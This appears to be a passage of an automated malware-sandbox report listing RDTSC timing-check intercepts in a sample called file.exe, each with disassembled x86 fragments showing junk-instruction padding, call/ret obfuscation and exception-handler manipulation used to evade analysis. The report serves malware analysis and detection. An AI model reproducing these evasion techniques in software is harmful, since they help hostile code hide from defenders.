              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8339A1 second address: 8339D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DAAh 0x00000009 popad 0x0000000a jp 00007FE8A0813DACh 0x00000010 popad 0x00000011 push eax 0x00000012 jbe 00007FE8A0813DAAh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jnc 00007FE8A0813DA6h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8339D6 second address: 8339E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837212 second address: 83721A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83721A second address: 83722F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edx 0x0000000d jng 00007FE8A076DDCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839517 second address: 83951B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AA01 second address: 83AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AA05 second address: 83AA0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE8A0813DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D5F5 second address: 83D60B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE8A076DDCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D774 second address: 83D788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A0813DAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D8E3 second address: 83D8ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE8A076DDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA52 second address: 83DA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FE8A0813DA6h 0x0000000c jmp 00007FE8A0813DB5h 0x00000011 popad 0x00000012 pushad 0x00000013 jne 00007FE8A0813DA6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jmp 00007FE8A0813DB8h 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA96 second address: 83DA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA9C second address: 83DAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841477 second address: 8414CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE8A076DDD5h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007FE8A076DDD9h 0x00000012 jmp 00007FE8A076DDD3h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FE8A076DDD5h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414CD second address: 8414E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414E0 second address: 8414E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414E6 second address: 8414EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84190B second address: 841911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841AE4 second address: 841AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841AEA second address: 841AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841CC2 second address: 841CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8420CF second address: 8420EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8420EA second address: 842107 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A0813DA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE8A0813DAEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842107 second address: 84210E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84228B second address: 8422B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE8A0813DAEh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842C13 second address: 842C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A076DDCFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843671 second address: 843677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84356F second address: 843593 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE8A076DDD3h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 844773 second address: 8447D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jne 00007FE8A0813DA6h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FE8A0813DA8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov edi, 79795D65h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007FE8A0813DA8h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 jnp 00007FE8A0813DACh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FC3 second address: 843FD5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FE8A076DDC8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8447D2 second address: 8447D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FD5 second address: 843FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 843FDB second address: 843FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 846C79 second address: 846C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jng 00007FE8A076DDC6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF7A2 second address: 7FF7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF7AA second address: 7FF7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF7AE second address: 7FF7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE8A0813DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 jmp 00007FE8A0813DB2h 0x00000016 pop edi 0x00000017 jne 00007FE8A0813DAAh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF7DC second address: 7FF7FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A076DDD7h 0x00000009 jl 00007FE8A076DDC6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847D87 second address: 847D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 847D8B second address: 847DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE8A076DDCBh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE8A076DDCCh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84BC0C second address: 84BC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E0DC second address: 84E0E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E0E0 second address: 84E0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E0E6 second address: 84E0EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E0EC second address: 84E127 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FE8A0813DAEh 0x00000012 push 00000000h 0x00000014 movzx ebx, si 0x00000017 push 00000000h 0x00000019 jmp 00007FE8A0813DAEh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jo 00007FE8A0813DA6h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849BD1 second address: 849BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E127 second address: 84E13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F1B7 second address: 84F1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A076DDC6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8501C9 second address: 8501CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8501CD second address: 8501ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE8A076DDD1h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F331 second address: 84F3B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FE8A0813DA8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jo 00007FE8A0813DABh 0x0000002b mov ebx, 37E1EFBBh 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+122D31C6h], ebx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov di, ax 0x00000047 mov eax, dword ptr [ebp+122D0B6Dh] 0x0000004d pushad 0x0000004e mov al, BDh 0x00000050 or edi, dword ptr [ebp+122D389Fh] 0x00000056 popad 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, 142B6B00h 0x0000005e nop 0x0000005f jg 00007FE8A0813DB8h 0x00000065 push eax 0x00000066 pushad 0x00000067 push ecx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 851169 second address: 85116F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8503E4 second address: 8503E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8512AD second address: 8512B7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8512B7 second address: 8512C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE8A0813DA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8512C1 second address: 8512C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8522B6 second address: 8522ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DAFh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FE8A0813DB0h 0x00000013 jng 00007FE8A0813DA6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jl 00007FE8A0813DA6h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 852381 second address: 85239A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE8A076DDD1h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8541B9 second address: 8541D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FE8A0813DACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85322E second address: 853238 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE8A076DDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8541D4 second address: 854248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 add dword ptr [ebp+122D1F4Ch], ecx 0x0000000e jbe 00007FE8A0813DA7h 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE8A0813DA8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 jg 00007FE8A0813DB4h 0x00000037 add dword ptr [ebp+122D2E32h], ecx 0x0000003d push 00000000h 0x0000003f jnc 00007FE8A0813DA6h 0x00000045 xchg eax, esi 0x00000046 push edi 0x00000047 jmp 00007FE8A0813DADh 0x0000004c pop edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jg 00007FE8A0813DA6h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 854248 second address: 85424C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 853238 second address: 8532B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FE8A0813DA8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3078h], edx 0x00000029 push dword ptr fs:[00000000h] 0x00000030 cld 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov eax, dword ptr [ebp+122D0A3Dh] 0x0000003e jmp 00007FE8A0813DAEh 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007FE8A0813DA8h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 00000019h 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f nop 0x00000060 push eax 0x00000061 push edx 0x00000062 jns 00007FE8A0813DA8h 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8532B5 second address: 8532CC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE8A076DDCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8532CC second address: 8532D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8532D0 second address: 8532DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85512C second address: 855130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855130 second address: 855134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855134 second address: 855184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a jl 00007FE8A0813DACh 0x00000010 add ebx, dword ptr [ebp+122D382Fh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FE8A0813DA8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 or bh, FFFFFF8Fh 0x00000037 xchg eax, esi 0x00000038 jns 00007FE8A0813DAEh 0x0000003e js 00007FE8A0813DA8h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 855184 second address: 85519B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 856102 second address: 85617E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FE8A0813DAAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FE8A0813DA8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D364Fh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FE8A0813DA8h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov dword ptr [ebp+12453A5Eh], edi 0x00000052 push 00000000h 0x00000054 movzx edi, si 0x00000057 xchg eax, esi 0x00000058 push ebx 0x00000059 push ebx 0x0000005a jnl 00007FE8A0813DA6h 0x00000060 pop ebx 0x00000061 pop ebx 0x00000062 push eax 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 push edi 0x00000067 pop edi 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85617E second address: 856182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85715F second address: 85716D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FE8A0813DA6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85716D second address: 857171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857171 second address: 857183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FE8A0813DA8h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857183 second address: 857221 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A076DDCBh 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov ebx, 21B700B9h 0x00000013 mov ebx, edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FE8A076DDC8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov ebx, dword ptr [ebp+122D2CF1h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FE8A076DDC8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 jmp 00007FE8A076DDD2h 0x00000058 sub dword ptr [ebp+1247BBAEh], edx 0x0000005e xchg eax, esi 0x0000005f jmp 00007FE8A076DDD3h 0x00000064 push eax 0x00000065 push eax 0x00000066 pushad 0x00000067 push ecx 0x00000068 pop ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
